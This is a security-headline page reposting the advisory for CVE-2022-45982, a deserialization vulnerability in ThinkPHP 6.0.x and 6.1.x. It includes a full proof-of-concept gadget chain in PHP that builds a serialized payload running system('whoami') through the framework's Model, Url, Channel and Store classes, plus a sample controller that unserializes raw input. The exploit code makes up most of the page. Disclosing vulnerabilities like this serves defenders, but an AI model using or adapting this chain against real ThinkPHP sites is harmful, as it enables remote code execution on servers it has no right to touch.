Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-45982: CVE-2022-45982

thinkphp 6.0.0~6.0.13 and 6.1.0~6.1.1 contains a deserialization vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload.

CVE
Open in Source
#vulnerability#php

thinkphp 6.0.0-6.0.13 and 6.1.0-6.1.1 contains a deserialization vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload.

First, Add new deserialization endpoint, such as:

<?php namespace app\controller;

use app\BaseController;

class Index extends BaseController { public function index($payload) { unserialize($payload);

}

}

Now, you can generate payload from:

<?php

namespace think { abstract class Model { private $lazySave = true; private $data = [‘a’ => ‘b’]; private $exists = true; protected $withEvent = false; protected $readonly = [‘a’]; protected $relationWrite; private $relation; private $origin = [];

    public function \_\_construct($value)
    {
        $this\->relation = \['r' => $this\];
        $this\->origin = \["n" => $value\];
        $this\->relationWrite = \['r' =>
            \["n" => $value\]
        \];
    }
}

class App
{
    protected $request;
}

class Request
{
    protected $mergeParam = true;
    protected $param = \["whoami"\];
    protected $filter = "system";
}

}

namespace think\model {

use think\\Model;

class Pivot extends Model
{
}

}

namespace think\route {

use think\\App;

class Url
{
    protected $url = "";
    protected $domain = "domain";
    protected $route;
    protected $app;

    public function \_\_construct($route)
    {
        $this\->route = $route;
        $this\->app = new App();
    }
}

}

namespace think\log { class Channel { protected $lazy = false; protected $logger; protected $log = [];

    public function \_\_construct($logger)
    {
        $this\->logger = $logger;
    }
}

}

namespace think\session { class Store { protected $data; protected $serialize = [“call_user_func”]; protected $id = "";

    public function \_\_construct($data)
    {
        $this\->data = \[$data, "param"\];
    }
}

}

namespace { $request = new think\Request(); // param $store = new think\session\Store($request); // save $channel = new think\log\Channel($store); // __call $url = new think\route\Url($channel); // __toString $model = new think\model\Pivot($url); // __destruct echo urlencode(serialize($model)); }

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE